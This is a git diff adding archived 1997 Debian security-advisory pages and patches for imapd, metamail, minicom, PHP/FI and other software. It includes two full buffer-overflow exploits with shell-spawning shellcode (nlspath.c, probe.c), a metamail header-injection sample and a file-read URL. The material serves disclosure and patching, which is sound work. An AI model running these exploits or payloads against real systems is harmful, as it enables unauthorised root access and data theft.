href="mailto:keryan@andrew.cmu.edu">keryan@andrew.cmu.edu</a> <br> +<a href="http://fatale.res.cmu.edu/">http://fatale.res.cmu.edu/</a> +</blockquote> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> + + diff --git a/english/security/info/amd-nodev.patch b/english/security/info/amd-nodev.patch new file mode 100644 index 00000000000..27247e4ffcd --- /dev/null +++ b/english/security/info/amd-nodev.patch @@ -0,0 +1,11 @@ +--- amd-upl102/config/os-linux.h.bad Mon Apr 7 16:41:51 1997 ++++ amd-upl102/config/os-linux.h Mon Apr 7 16:42:19 1997 +@@ -252,7 +252,7 @@ + + #define M_RDONLY 1 /* mount read-only */ + #define M_NOSUID 2 /* ignore suid and sgid bits */ +-#define M_NONDEV 4 /* disallow access to device special files */ ++#define M_NODEV 4 /* disallow access to device special files */ + #define M_NOEXEC 8 /* disallow program execution */ + #define M_SYNC 16 /* writes are synced at once */ + #define M_REMOUNT 32 /* alter flags of a mounted FS */ diff --git a/english/security/info/doom.html b/english/security/info/doom.html new file mode 100644 index 00000000000..3ae4df82c51 --- /dev/null +++ b/english/security/info/doom.html @@ -0,0 +1,32 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> +Debian takes security very seriously. Most <a href="../index.html">security problems</a> brought +to our attention are corrected within 48 hours. + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<blockquote> +<b>From <a href="mailto:alan@cymru.net">Alan Cox</a></b> <p> +Secondly anyone using the Doom startmouse/startmouse.sh script... that +creates a /tmp/gpmscript should note that a user can replace that script +and get root access. +</blockquote> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> + + diff --git a/english/security/info/elm-me+.html b/english/security/info/elm-me+.html new file mode 100644 index 00000000000..2ce7bad41fc --- /dev/null +++ b/english/security/info/elm-me+.html @@ -0,0 +1,52 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> +Debian takes security very seriously. Most <a href="../index.html">security problems</a> brought +to our attention are corrected within 48 hours. + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<blockquote> +<b>From: John Goerzen <jgoerzen@happy.cs.twsu.edu></b>, Maintainer of elm <br> +<b>Date: Thu, 15 May 1997 11:44:08 -0500</b><p> + +There has recently been announced a security hole in Elm on bugtraq and +subsequently on linux-security that could lead to unauthorized to, at +minimum, the mail spool for every user on the system.<p> + +Debian's default Elm for stable (1.2.x) is Elm. This version of Elm is +vulnerable.<p> + +The default mailer for frozen (upcoming 1.3 release) and unstable +(continuing development), Elm-ME+ (an enhanced version of Elm), is also +vulnerable.<p> + +I have patched Elm-ME+ to fix this problem. I have released the packages +into stable, frozen, and unstable. In addition, the latest Elm-ME+ is +always available via anonymous FTP from <a href="ftp://happy.cs.twsu.edu/pub/Debian/binaries/">ftp://happy.cs.twsu.edu/pub/Debian/binaries/</a>. <p> + +The fixed version of Elm-ME+, elm-me+_2.4pl25ME+31-5_i386.deb, is available +for immediate download at <a href="ftp://happy.cs.twsu.edu/pub/Debian/binaries/elm-me+_2.4pl25ME+31-5_i386.deb">ftp://happy.cs.twsu.edu/pub/Debian/binaries/elm-me+_2.4pl25ME+31-5_i386.deb</a>. <p> + +I would advise people to upgrade to the latest Elm-ME+. Those people +running Elm and not Elm-ME+ -- Elm-ME+ fixes a number of other bugs as well, +so it wouldn't hurt to upgrade. <p> +</blockquote> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> + + diff --git a/english/security/info/imapd.html b/english/security/info/imapd.html new file mode 100644 index 00000000000..a28e71e5380 --- /dev/null +++ b/english/security/info/imapd.html @@ -0,0 +1,223 @@ +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> +Debian takes security very seriously. Most <a href="../index.html">security problems</a> brought +to our attention are corrected within 48 hours. + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<blockquote> +<b>Date: Sun, 2 Mar 1997 21:42:14 -0700</b> <br> +<b>From: David Sacerdote <davids@SECNET.COM></b> <p> + +<pre> + ###### ## ## ###### + ## ### ## ## + ###### ## # ## ## + ## ## ### ## + ###### . ## ## . ######. + + Secure Networks Inc. + + Security Advisory + March 2, 1997 + + + Buffer Overflow in imapd and ipop3d +</pre> + +A vulnerability exists within Mark Crispin's mail server toolkit that will +allow arbitrary individuals to obtain root access to servers running +imapd and ipop3d. This vulnerability is present in both the POP3 and IMAP2bis +servers included in the PINE distribution, as well as the IMAP2bis and +IMAP4 servers included in Mr. Crispin's IMAP toolkit. <p> + + +<b>Technical Details</b> <p> + +The vulnerable mail servers call a library routine to affect a Unix +"login", authenticating the user against it's password. A stack overrun +exists in this routine. In essence this will allow any client with the ability +to attempt a login to enter an overly long username to cause arbitrary machine +code to execute. <p> + +Both the POP and IMAP servers Mr. Crispin distributes discard supervisory +privileges sometime after this authentication phase. Unfortunately, the +overflow occurs before this happens, and the vulnerability will thus +allow an attacker superuser access. <p> + +The problematic routine is server_login(), which is in "log_xxx.c" in the +OS-dependent code tree of the server source distribution. The problem +occurs due to the routine's attempt to allow a case insensitive match on +the username, which it does by copying the username provided to the +routine into an automatic variable in the routine's stack. <p> + +The username buffer is MAILTMPLEN long, which defaults to 1024 bytes. +Unfortunately, the server's input buffer is greater than this, allowing a +remote client to feed the routine a username greater than 1024 bytes. +If the excess characters in this username contain a valid virtual memory +address, the routine will overwrite it's stack frame when copying the +username, causing the return from the routine to jump to an unexpected +location. <p> + +Interestingly, the buffer is converted to lowercase after being copied. +This provides a slight technical challenge, as the machine code required +to take over the server contains uppercase characters. However, +modifications to the "standard" stack overrun exploit code to reverse the +affects of this lowercasing were trivial. On i386 4.4BSD, the VM address +required to redirect server_login()'s return need not contain uppercase +characters. <p> + +The flawed code reads: <p> + +<pre> +long server_login (char *user, char *pass, int argc, char *argv[]) +{ + char tmp[MAILTMPLEN]; + struct passwd *pw = getpwnam (user); + /* allow case-independent match */ + if(!pw) pw = getpwnam (lcase (strcpy (tmp, user))); + + <complete server login and return> +} +</pre> + + +<b>Impact</b> <p> + + +Remote individuals, who do not have a valid username and password for +the mail server, can obtain root access to systems running a vulnerable +IMAP or POP server. <p> + + +<b>Vulnerable Systems</b> <p> + +Any system running Mark Crispin's POP or IMAP server, of a release +earlier than 4.1beta is vulnerable. To determine whether your system +is vulnerable, telnet to ports 109, 110, 143 and 220. If you see a banner +looking like: <p> + +<pre> +* OK example.com IMAP2bis Service 7.8(92) at Mon, 3 Mar 1997 12:00:00 +-0500 (EST) + +or: + +* OK example.com IMAP4 v10.00 server ready + +or: + ++OK example.com POP3 3.0(10) w/IMAP client (Report problems in this server +to MRC@CAC.Washington.edu) at Mon, 3 Mar 1998 12:00:00 -0500 (EST) +</pre> + + +Then your system is vulnerable. If you see "POP3 3.3" or "IMAP4rev1" +or later, your POP or IMAP server is not vulnerable. <p> + +POP servers not derived from Mark Crispin's code, including the somewhat +confusingly named "pop3d" from the University of California at Davis are +not vulnerable to the attack described in this advisory. Similarly, +the University of California at Berkeley popper, and derived POP servers, +including the Qualcomm popper, are not vulnerable to this attack. <p> + +<b>Fix Information</b> <p> + +As a temporary workaround, you can disable the POP and IMAP services +in /etc/inetd.conf, and then kill and restart inetd. <p> + +You can fix the problem in the source yourself, by changing the +server_login() function to read: <p> + +<pre> + char tmp[MAILTMPLEN]; + struct passwd *pw = getpwnam (user); + + if(!pw) { + strncpy(tmp, user, MAILTMPLEN - 1); + pw = getpwnam(lcase(tmp)); +</pre> + +Or, as a final option, you can switch to the IMAP 4.1 beta distribution, +which can be found at <a href="ftp://ftp.cac.washington.edu/mail/imap.tar.Z">ftp://ftp.cac.washington.edu/mail/imap.tar.Z</a>. <p> + +<b>Additional Information</b> <p> + +If you have any questions about this advisory, feel free to contact me, +by sending mail to davids@secnet.com If you wish to encrypt your +messages to me, feel free to use the following PGP public key. <p> + +<pre> +-----BEGIN PGP PUBLIC KEY BLOCK----- +Version: 2.6.2 + +mQCNAzJ4qJAAAAEEAOgB7mooQ6NgzcUSIehKUufGsyojutC7phVXZ+p8FnHLLZNB +BLQEtj5kmfww2A2pR29q4rgPeqEUOjWPlLNdSLby3NI8yKz1AQSQLHAwIDXt/lku +8QXClaV6pNIaQSN8cnyyvjH6TYF778yZhYz0mwLqW6dU5whHtP93ojDw1UhtAAUR +tCtEYXZpZCBTYWNlcmRvdGUgPGRhdmlkc0BzaWxlbmNlLnNlY25ldC5jb20+ +=LtL9 +-----END PGP PUBLIC KEY BLOCK----- +</pre> + +Further information about the Interactive Mail Aaccess Protocol can be +found in RFCs 1731, 1732, 1733, 2060, 2061, 2062, 2086, 2087, 2088, and +2095. Further information about the Post Office Protocol can be found +in RFCs 1939 and 1957. Copies of RFCs can be found at +<a href="http://ds.internic.net/rfc/rfcXXXX.txt">http://ds.internic.net/rfc/rfcXXXX.txt</a>. <p> + +For further information about Secure Networks Inc, including product +information, past advisories, and papers, see <a href="http://www.secnet.com/">http://www.secnet.com/</a>. + +If you wish to obtain Secure Networks advisories via our mailing list, +please send mail to sni-advisories-request@secnet.com, with a single line +reading: +subscribe sni-advisories <p> + + +<b>Copyright</b> <p> + + +The contents of this advisory are Copyright (C) 1997 Secure Networks Inc, +and may be distributed freely provided that no fee is charged for +distribution, and that proper credit is given. <p> + +imapd and ipop3d fall under the following license: <p> + +Copyright 1997 by the University of Washington <p> + +Permission to use, copy, modify, and distribute this software and its +documentation for any purpose and without fee is hereby granted, provided +that the above copyright notice appears in all copies and that both the +above copyright notice and this permission notice appear in supporting +documentation, and that the name of the University of Washington not be +used in advertising or publicity pertaining to distribution of the software +without specific, written prior permission. This software is made +available "as is", and +THE UNIVERSITY OF WASHINGTON DISCLAIMS ALL WARRANTIES, EXPRESS OR IMPLIED, +WITH REGARD TO THIS SOFTWARE, INCLUDING WITHOUT LIMITATION ALL IMPLIED +WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE, AND IN +NO EVENT SHALL THE UNIVERSITY OF WASHINGTON BE LIABLE FOR ANY SPECIAL, +INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM +LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, TORT +(INCLUDING NEGLIGENCE) OR STRICT LIABILITY, ARISING OUT OF OR IN CONNECTION +WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + +</blockquote> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> + + diff --git a/english/security/info/inetd-groups.html b/english/security/info/inetd-groups.html new file mode 100644 index 00000000000..5d0b62eccf1 --- /dev/null +++ b/english/security/info/inetd-groups.html @@ -0,0 +1,54 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> +Debian takes security very seriously. Most <a href="../index.html">security problems</a> brought +to our attention are corrected within 48 hours. + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<blockquote> +<b>Date: Tue, 25 Mar 1997 02:30:39 -0500</b> <br> +<b>From: David Holland <dholland@eecs.harvard.edu></b> <p> + +<pre> + > In message <Pine.SUN.3.94.970324024042.15592A@dfw.dfw.net> Aleph One writes: + > : tftpd in FreeBSD distribution uses chroot() and sets its uid to nobody. + > : I don't think, it does anything reasonable with groups. + > + > FreeBSD's inherits the groups from the calling process, which is + > inetd. I don't know if this is reasonable or not, but I think that it + > means that the group will be daemon. tftpd doesn't do anything with + > groups. +</pre> + +While we're at it: many inetds don't clear the groups list when they +start up, so that if you kill and restart inetd from your root shell +inetd subprocesses may inherit additional (probably privileged) +groups. <p> + +I don't know if FreeBSD's inetd suffers from this problem, but the +currently released Linux one does. (The next release won't; if there's +interest I can post the patch.) <p> + +The impact of this problem is fortunately fairly limited, and there's +not usually any real reason for root to be in a whole stack of groups. <p> + +</blockquote> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> + + diff --git a/english/security/info/metamail.html b/english/security/info/metamail.html new file mode 100644 index 00000000000..5b2ded2b33b --- /dev/null +++ b/english/security/info/metamail.html @@ -0,0 +1,80 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> +Debian takes security very seriously. Most <a href="../index.html">security problems</a> brought +to our attention are corrected within 48 hours. + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<blockquote> +<b>From: Alan Cox <alan@cymru.net></b> <br> +<b>Date: Wed, 9 Apr 1997 10:58:48 +0100 (BST)</b> <p> + +This appears to be a tcsh bug, but it shows up with metamail and can +be abused. Olaf's message follows below. I've also passed it on to CERT <p> + +Alan Cox <p> + +<hr> + +Hi Alan, <p> + +Here's the info on metamail I promised to send you. The hole may be +exploitable if you let metamail run showext for messages of type +message/external-body. At least tcsh, and possily a few other csh's, +do seem to do weird things when expanding command line arguments. +If you give a script an argument of "foo FTP=/tmp/evilcmd", and it +does <p> + +<pre> + set var=$1 +</pre> + +this will assign foo to $var, and /tmp/evilcmd to $FTP. Unfortunately, +metamail invokes showext with the mime attributes on the command line, +so you basically send it a header like this <p> + +<pre> + Content-type: message/external-body; + access-type="anon-ftp"; + name="passwd"; + site="monad.swb.de"; + directory="/etc"; + mode="image FTP=/tmp/evilcmd" +</pre> + +Further below, the script will run $FTP to initiate the ftp connection. +Up to now, I have not been able to pass arguments to the command, but +that doesn't mean that you can't do interesting things with the above. <p> + +The patch is appended <a href="metamail.patch">here</a>. <p> + +Cheers +Olaf <p> +<hr> +<pre> +Olaf Kirch | --- o --- Nous sommes du soleil we love when we play +okir@monad.swb.de | / | \ sol.dhoop.naytheet.ah kin.ir.samse.qurax +okir@lst.de +-------------------- Why Not?! ----------------------- +</pre> +<hr> + +</blockquote> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> + + diff --git a/english/security/info/metamail.patch b/english/security/info/metamail.patch new file mode 100644 index 00000000000..e58eeaa67fe --- /dev/null +++ b/english/security/info/metamail.patch @@ -0,0 +1,66 @@ +diff -ur zap/mm2.7/src/bin/showexternal mm2.7/src/bin/showexternal +--- zap/mm2.7/src/bin/showexternal Tue Feb 8 17:39:05 1994 ++++ mm2.7/src/bin/showexternal Thu Jan 16 12:00:25 1997 +@@ -27,26 +27,34 @@ + echo "Usage: showexternal body-file access-type name [site [directory [mode [server]]]]" + exit -1 + endif +-set bodyfile=$1 ++# Check argument integrity. Don't trust mail headers ++switch ("$1$2$3$4$5$6$7") ++case "*[ ]*": ++ echo "Illegal white space in arguments -- possibly a mail bomb?!" ++ echo "Command was:" ++ echo \'$0\' \'$1\' \'$2\' \'$3\' \'$4\' \'$5\' \'$6\' \'$7\' ++ exit 2 ++endsw ++set bodyfile="$1" + set atype=`echo $2 | tr ABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyz` +-set name=$3 ++set name="$3" + if ($#argv > 3) then +- set site=$4 ++ set site="$4" + else + set site="" + endif + if ($#argv > 4) then +- set dir=$5 ++ set dir="$5" + else + set dir="" + endif + if ($#argv > 5) then +- set mode=$6 ++ set mode="$6" + else + set mode="" + endif + if ($#argv > 6) then +- set server=$7 ++ set server="$7" + else + set server="" + endif +diff -ur zap/mm2.7/src/bin/showpartial mm2.7/src/bin/showpartial +--- zap/mm2.7/src/bin/showpartial Thu Feb 3 00:21:29 1994 ++++ mm2.7/src/bin/showpartial Thu Jan 16 11:48:59 1997 +@@ -11,14 +11,14 @@ + echo "Usage: showpartial file id partnum totalnum" + exit -1 + endif +-set file=$1 ++set file="$1" + # This next line is because message-id can contain weird chars +-set id=`echo $2 | tr -d \!\$\&\*\(\)\|\'\"\;\/\<\>\\` +-@ partnum = $3 ++set id=`echo "$2" | tr -d \!\$\&\*\(\)\|\'\"\;\/\<\>\\` ++@ partnum = "$3" + if ($#argv == 3 || $4 == "") then + set totalnum=-1 + else +- @ totalnum = $4 ++ @ totalnum = "$4" + endif + + if (! -d $TREEROOT) then diff --git a/english/security/info/minicom.html b/english/security/info/minicom.html new file mode 100644 index 00000000000..db36fd09861 --- /dev/null +++ b/english/security/info/minicom.html @@ -0,0 +1,79 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> +Debian takes security very seriously. Most <a href="../index.html">security problems</a> brought +to our attention are corrected within 48 hours. + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<blockquote> +<b>Date: Mon, 10 Feb 1997 05:44:53 +0400</b> <br> +<b>From: "Dmitry E. Kim" <jason@redline.ru></b> <p> + + hi ppl, <p> + + well, here is another standard buffer overrun vulnerability, which may +sometimes lead to root compromise (not always. not in new distributions, +fortunately). Current Slackware and current RedHat don't install minicom +suid root, only sgid/uucp, which is not *that* dangerous. But when you +build minicom from source, it asks you to do "chmod +s" on it. <p> + +<dl> +<dt><b>Summary:</b> +<dd> Vulnerability in minicom allows (certain) local users to obtain group + "uucp" privileges and, in certain cases, root privileges. + +<dt><b>Platforms:</b> +<dd> Supposedly all platforms where minicom is installed suid and/or sgid. + I have tested it only on several Linux boxes (fresh Slackware 3.1 and + fresh RedHat 4.1), and it works for me. + +<dt><b>Description:</b> +<dd> According to man pages, "minicom is a communication program which somewhat + resembles the shareware program TELIX but is free with source code and runs + under most unices". + Minicom binary is usually owned by user "root" and group "uucp", and it + is "-rwxr-sr-x" or, in some old distributions, "-rwsr-sr-x". Actually, + minicom has *alot* of arbitrary size buffers and it is really easy to + overrun some of them. At least one of these overrunable buffers is + automatic -- an argument to "-d" option of minicom is copied into 128 bytes + long automatic array. Thus, it is possible to overwrite the function return + address and to execute an arbitrary code (as usually). + +<dt><b>Impact:</b> +<dd> If minicom is installed suid root, any user which is permitted to use + minicom can obtain root shell. If minicom is installed sgid uucp, any + minicom user can obtain uucp group privileges (please don't think it's + nothing -- at least on Slackware machines /usr/lib/uucp is group-writeable. + This means you can easily substitute uucico/uuxqt/etc with your scripts). + +<dt><b>Solution:</b> +<dd> Quick fix, as usually -- chmod 755 `which minicom`. + +<dt><b>Exploit:</b> +<dd> Below goes the exploit for Linux. After running this, you have shell with + uid=0 and euid=your_usual_uid (if minicom is suid root) and gid=uucp + egid=your_usual_gid. Getting real root and real uucp group permissions from + that is really too trivial to describe here. + +Quoting file "<a href="stack.c">stack.c</a>" + +</blockquote> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> + + diff --git a/english/security/info/nlspath.c b/english/security/info/nlspath.c new file mode 100644 index 00000000000..8b69b566221 --- /dev/null +++ b/english/security/info/nlspath.c @@ -0,0 +1,39 @@ +/* + * NLSPATH buffer overflow exploit for Linux, tested on Slackware 3.1 + * Copyright (c) 1997 by Solar Designer + */ + +#include <stdio.h> +#include <stdlib.h> +#include <unistd.h> + +char *shellcode = + "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1" + "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04" + "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb" + "\xcd\x80/" + "/bin/sh" + "0"; + +char *get_sp() { + asm("movl %esp,%eax"); +} + +#define bufsize 2048 +char buffer[bufsize]; + +main() { + int i; + + for (i = 0; i < bufsize - 4; i += 4) + *(char **)&buffer[i] = get_sp() - 3072; + + memset(buffer, 0x90, 512); + memcpy(&buffer[512], shellcode, strlen(shellcode)); + + buffer[bufsize - 1] = 0; + + setenv("NLSPATH", buffer, 1); + + execl("/bin/su", "/bin/su", NULL); +} diff --git a/english/security/info/nlspath.html b/english/security/info/nlspath.html new file mode 100644 index 00000000000..cecbc510fb6 --- /dev/null +++ b/english/security/info/nlspath.html @@ -0,0 +1,63 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> +Debian takes security very seriously. Most <a href="../index.html">security problems</a> brought +to our attention are corrected within 48 hours. + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<blockquote> +<b>Date: Thu, 13 Feb 1997 23:08:13 -0500</b> <br> +<b>From: solar@IDEAL.RU</b> <p> + +Hi! <p> + +I'm sorry if the information I'm going to tell about was already known, but +I hope it wasn't... <p> + +I just occasionally found a vulnerability in Linux libc (actually, some of +the versions seem not to be vulnerable; my Slackware 3.1 box was though). +Unfortunately, I have no time for a real investigation right now, but here's +the exploit anyway. Note that the shellcode is a bit different from the +usual one: <p> +<ul> +<li> it does setuid(geteuid()) by itself; +<li> easier to modify (no more fixed offsets in shellcode, and the shell name +can be changed, too -- the length is not fixed); +<li> the NULL pointer itself is passed in %edx to the execve syscall, not the +pointer to NULL (it seems like a mistake in the Aleph One's article); this +doesn't seem to affect anything though. +</ul> + +It might be possible to exploit this hole remotely, if using a patched telnet +client which would allow exporting large environment variable values. The +overflow would happen at /bin/login startup then (somewhat like the famous +LD_PRELOAD exploit, but an overflow). I'm not sure of that though, there might +be some restrictions on environment variables in telnetd. <p> + +As for the fix, well, this is a hard one -- would require re-compiling libc, +and statically linked binaries. To protect yourself against remote attacks, +you could for example change the variable name to something different, with +a hex editor (like /usr/bin/bpe), in /lib/libc.so.5, and ensure the exploit +stopped working. Of course, this is only a temporary fix. <p> + +<a href="nlspath.c">nlspath.c</a> and <a href="shellcode.s">shellcode.s</a> +</blockquote> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> + + diff --git a/english/security/info/php.html b/english/security/info/php.html new file mode 100644 index 00000000000..3ca03bf2a57 --- /dev/null +++ b/english/security/info/php.html @@ -0,0 +1,87 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> +Debian takes security very seriously. Most <a href="../index.html">security problems</a> brought +to our attention are corrected within 48 hours. + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<blockquote> +<b>Date: Wed, 16 Apr 1997 21:01:12 -0400</b><br> +<b>From: Shamanski <jshaman@m-net.arbornet.org></b><p> + +<hr> +[DiS] Advisory 97-347.1<br> +Issue date: April 16, 1997<br> +Topic: REMOTE Vulnerability in PHP/FI<br> +<hr> + +A vulnerability has been found by DiS in PHP/FI, a NCSA httpd cgi enhancment. +This vulnerability allows unauthorized users to view arbitrary file contents +on the machine running httpd by sending the file name wishing to be displayed +as the QUERY_STRING. <p> + +<ol> +<li> Exploit + + simply use any web browser to send the following URL: + + http://boogered.system.com/cgi-bin/php.cgi?/file/to/view + + Note: this exploit has not been tested on a system that has compiled + PHP/FI as an apache module. This information may or may not + be applicable on such a system. + +<li> Impact + + Remote, unauthorized users can view arbitrary file contents on the + system with the same privileges as the httpd (HTTP daemon) child process. + + +<li> Solution + + The author has propsed the following sollution: + + <em> + ...The workaround is to set the following in php.h<p> + + #define PATTERN_RESTRICT ".*\\.phtml$"<p> + + This will limit the php.cgi parser to only display files ending in .phtml <p> + + The exact same adviasory applies to any other parser someone might decide + to stick in their cgi-bin directory. This is in no way specific to PHP/FI. <p> + + You can also avoid the problem by using either CGI redirection or + by using the Apache module version. <p> + + -Rasmus + </em> +</ol> + +The current PHP/FI distribution may be obtained from <a href="http://www.vex.net/php/">http://www.vex.net/php/</a> <p> + +<hr> +J-Man Th' Shaman [DiGiTAL iNFORMATiON SOCiETY]<br> +<a href="mailto:jshaman@m-net.arbornet.org">jshaman@m-net.arbornet.org</a><br> +<a href="mailto:jamin@avatar.ml.org">jamin@avatar.ml.org</a><p> +<hr> +</blockquote> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> + + diff --git a/english/security/info/probe.c b/english/security/info/probe.c new file mode 100644 index 00000000000..05b04f7b9d6 --- /dev/null +++ b/english/security/info/probe.c @@ -0,0 +1,39 @@ +/* + * SuperProbe buffer overflow exploit for Linux, tested on Slackware 3.1 + * Copyright (c) 1997 by Solar Designer + */ +#include <stdio.h> +#include <stdlib.h> +#include <unistd.h> + +char *shellcode = + "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1" + "\xff\xd4\x31\xc0\x8d\x51\x04\x89\xcf\x89\x02\xb0\x2e\x40\xfc\xae\x75\xfd" + "\x89\x39\x89\xfb\x40\xae\x75\xfd\x88\x67\xff\xb0\x0b\xcd\x80\x31\xc0\x40" + "\x31\xdb\xcd\x80/" + "/bin/sh" + "0"; + +char *get_sp() { + asm("movl %esp,%eax"); +} + +#define bufsize 8192 +#define alignment 0 +char buffer[bufsize]; + +main() { + int i; + + for (i = 0; i < bufsize / 2; i += 4) + *(char **)&buffer[i] = get_sp() - 2048; + memset(&buffer[bufsize / 2], 0x90, bufsize / 2); + strcpy(&buffer[bufsize - 256], shellcode); + setenv("SHELLCODE", buffer, 1); + + memset(buffer, 'x', 72); + *(char **)&buffer[72] = get_sp() - 6144 - alignment; + buffer[76] = 0; + + execl("/usr/X11/bin/SuperProbe", "SuperProbe", "-nopr", buffer, NULL); +} diff --git a/english/security/info/rlogin.html b/english/security/info/rlogin.html new file mode 100644 index 00000000000..8ede1577155 --- /dev/null +++ 